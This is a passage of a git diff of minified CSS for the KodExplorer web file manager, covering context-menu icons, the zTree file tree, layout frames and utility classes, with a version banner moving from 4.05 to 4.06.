.app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;} html #body .menu-left .setting a, html body .menu-left .setting a{ text-indent:6px;} html .file-list-list .file .filename, html #main-title .filename, html .file-list-list .file .filetime, html #main-title .filetime{ width:100px;} html .file-list-list .file .filetype, html #main-title .filetype, html .file-list-list .file .filesize, html #main-title .filesize{ width:30px;} html .topbar .content .btn-wap-menu{ display:block !important;visibility:visible !important;position:absolute;text-align:center;z-index:100;left:0;top:0;padding:0;background:rgba(0,0,0,0.05);width:45px;height:38px;line-height:40px;} html .topbar .content .btn-wap-menu i.font-icon{ padding-right:0;} html .topbar .content .top-left.collapse{ display:none;} html .topbar .content .top-left{ width:170px;height:auto;background:#fff;color:#666;position:absolute;left:45px;z-index:100;border:1px solid rgba(0,0,0,0.1);box-shadow:0 4px 30px rgba(0,0,0,0.15);} html .topbar .content .top-left .topbar-menu.title{ display:none;} html .topbar .content .top-left .topbar-menu{ float:none;border:none;} html body#page-desktop .topbar .content .btn-wap-menu{ color:#fff;} html body#page-desktop .topbar .content .top-left{ background:rgba(0,0,0,0.7);}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item .font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list .context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd !important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.ztree{margin:0px;padding:10px 0px;font-size:1em;}.ztree li{padding:0;margin:0;list-style:none;text-align:left;white-space:nowrap;outline:0;}.ztree li ul{margin:0;padding:0;}.ztree li.level0{margin-bottom:4px;}.ztree li.level0>span.tree_icon{width:20px;}.ztree li span{line-height:24px;}.ztree li span.button{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:24px;width:20px;margin-right:5px;}.ztree li span.button.switch{width:25px;height:25px;margin-right:0px;background:none;text-align:center;line-height:25px;}.ztree li span.button.switch:hover{background:rgba(0,0,0,0.03);}.ztree li span.button.switch:after{content:"\f0da";font-family:FontAwesome;color:#aaa;text-decoration:inherit;font-size:1.25em;line-height:16px;padding-left:6px;-webkit-font-smoothing:antialiased;}.ztree li span.button.switch.noline_docu:after{content:' ';}.ztree li span.button.switch.noline_open:after,.ztree li span.button.switch.noline_open_hover:after{content:"\f0d7";}.ztree li span.button.switch.switch_hover:after{color:#63acff;}.ztree li span.button.ico_loading{background:url("../../../images/common/loading_tree.gif") no-repeat 0 0px transparent !important;}.ztree li span.button.ico_loading .x-item-file{display:none;}.ztree li span.tree_icon{height:21px;width:21px;background:none;overflow:hidden;}.ztree li span.tree_icon img{width:100%;max-width:100%;max-height:100%;}.ztree li a{padding-top:0px;cursor:pointer;text-decoration:none;display:block;margin:0;color:#333;vertical-align:top;line-height:24px;height:24px;padding-left:10px;border:1px solid #fff;position:relative;}.ztree li a:hover{text-decoration:none;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;background:#eee;height:24px;border:1px solid #eee;}.ztree li a.curSelectedNode,.ztree li a.curDropTreeNode{border:1px solid #63acff;background:#63acff;line-height:24px;height:24px;color:#fff;}.ztree li a.curSelectedNode .button.switch:after,.ztree li a.curDropTreeNode .button.switch:after{color:#fff !important;}.ztree li a.curDropTreeNode{box-shadow:0 0 0 1px #fff inset !important;}.ztree li a.curSelectedNode_Edit{border:1px solid #63acff;background:#63acff;color:black;height:24px;}.ztree li a input.rename{height:25px;line-height:24px;padding:0;margin:0;border:none;outline:none;margin-left:-3px;padding-left:3px;width:106px;position:absolute;margin-top:-1px;}.ztree li a span.button.root_docu,.ztree li a span.button.noline_docu{background:none;}.ztree li a .menu-item{display:none;position:absolute;right:4px;top:4px;width:14px;height:13px;box-sizing:content-box;text-align:center;border:1px solid #ccc;background:#fff;border-radius:2px;cursor:pointer;z-index:50;}.ztree li a .menu-item:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.ztree li a .menu-item:hover .cert{border-top-color:#3399ff;}.ztree li a .menu-item .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.ztree li a:hover .menu-item,.ztree li a.curSelectedNode .menu-item{display:block;}ul.ztree.zTreeDragUL{margin:0;padding:0;position:absolute;width:auto;height:auto;background-color:#63acff;border:1px solid #63acff;opacity:0.5;filter:alpha(opacity=50);}ul.ztree.zTreeDragUL li a span.space{display:none !important;}ul.ztree.zTreeDragUL li a{padding:4px 10px 0 10px;color:#fff;}ul.ztree.zTreeDragUL li span.button.switch{display:none;}.ztree li a.tmpTargetNode_inner{background:#0076fc;border:1px solid #3091ff;color:#fff;}.ztree li a.tmpTargetNode_prev{border-bottom:1px solid #f96;}.ztree li a.tmpTargetNode_next{border-bottom:1px solid #f96;}span.tmpzTreeMove_arrow{display:inline-block;margin:4px 0 0 2px;position:absolute;border-color:transparent transparent transparent #fff;border-style:solid;border-width:7px 0px 7px 7px;width:0;height:0;_border-top-color:white;_border-bottom-color:white;_filter:chroma(color=white);}.frame-left .ztree li .file{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:22px;width:18px;margin-right:5px;}.frame-main{position:absolute;top:40px;width:100%;bottom:0px;}.frame-main .tools-left{background:#f8f8f8 url("../../../images/common/bg.gif") 0 0px;position:fixed;line-height:30px;padding-left:20px;height:28px;border-bottom:1px solid #ddd;left:0;width:100%;}.frame-main .tools-left a{font-size:1.25em;font-weight:800;text-decoration:none;color:#999;text-shadow:0 0 3px;display:inline-block;padding:2px 6px;margin-top:0;height:20px;line-height:20px;}.frame-main .tools-left a:hover{background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;-webkit-box-shadow:0 2px 8px rgba(0,0,0,0.8);-moz-box-shadow:0 2px 8px rgba(0,0,0,0.8);box-shadow:0 2px 8px rgba(0,0,0,0.8);-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;}.frame-main .frame-left{position:absolute;left:0;top:30px;bottom:0;width:200px;background:#fff;background-attachment:fixed;overflow:auto;}.frame-main .frame-left .ztree{margin-top:0;}.frame-main .frame-left .ztree li.level0{margin-bottom:5px;}.frame-main .frame-resize{width:10px;cursor:col-resize;z-index:100;position:absolute;left:195px;top:0;bottom:0;overflow:hidden;background:url("../../../images/common/resize.png") 0px 50% no-repeat;}.frame-main .frame-resize.active{background:#000;opacity:0.2;filter:alpha(opacity=20);}.frame-main .frame-right{left:200px;right:0;position:absolute;top:0;bottom:0;overflow:auto;}.frame-main .frame-right .frame-right-main .resize-mask{z-index:999;position:absolute;left:0;top:0;bottom:0;right:0;display:none;}.frame-main .frame-right .frame-right-main .frame{height:100%;border-left:1px solid #ddd;overflow:hidden;} +/* ver 4.06(2017-08-30) [build 1504100993.7246] */ \ No newline at end of file diff --git a/static/style/skin/base/app_explorer.css b/static/style/skin/base/app_explorer.css index fd61bc1..2ac51e4 100755 --- a/static/style/skin/base/app_explorer.css +++ b/static/style/skin/base/app_explorer.css @@ -1,4 +1,4 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738069.5179] */ -body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}